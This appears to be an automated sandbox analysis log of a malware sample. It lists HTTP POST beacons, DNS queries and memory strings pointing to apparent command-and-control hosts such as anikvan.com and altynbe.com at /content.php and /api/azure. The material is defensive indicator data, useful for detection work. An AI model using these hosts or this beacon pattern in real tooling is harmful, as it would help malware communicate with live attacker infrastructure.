Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: boriz400.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: workspacin.cloudContent-Length: 248Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: workspacin.cloudContent-Length: 180Cache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 22_2_013A4004 InternetReadFile,

22_2_013A4004

Source: global traffic	DNS traffic detected: DNS query: boriz400.com
Source: global traffic	DNS traffic detected: DNS query: altynbe.com
Source: global traffic	DNS traffic detected: DNS query: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io
Source: global traffic	DNS traffic detected: DNS query: anikvan.com
Source: global traffic	DNS traffic detected: DNS query: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
Source: global traffic	DNS traffic detected: DNS query: workspacin.cloud

Source: unknown

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 May 2024 22:04:29 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeStrict-Transport-Security: max-age=15724800; includeSubDomains
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 May 2024 22:04:54 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeStrict-Transport-Security: max-age=15724800; includeSubDomains
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 May 2024 22:05:03 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeStrict-Transport-Security: max-age=15724800; includeSubDomains
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 May 2024 22:05:21 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeStrict-Transport-Security: max-age=15724800; includeSubDomains

Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000016.00000000.1850142884.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.1847476814.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2941807069.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: Amcache.hve.9.dr	String found in binary or memory: http://upx.sf.net
Source: explorer.exe, 00000016.00000000.1859052974.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2945734291.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000016.00000002.2945734291.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/
Source: rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/5~
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/=~
Source: rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/B_F
Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/U~
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/X
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/api/azure
Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/api/azureontent.phpMfE
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/api/azurep
Source: rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/api/azureure
Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/content.php
Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/content.php2f
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/d
Source: rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/db-53011b87bd06
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/ic
Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/tyk.io
Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anikvan.com/
Source: rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anikvan.com/I~
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738816096.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anikvan.com/api/azure
Source: rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738816096.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anikvan.com/api/azure==
Source: rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anikvan.com/api/azuret.php.f
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anikvan.com/content.php
Source: rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anikvan.com/content.php.f
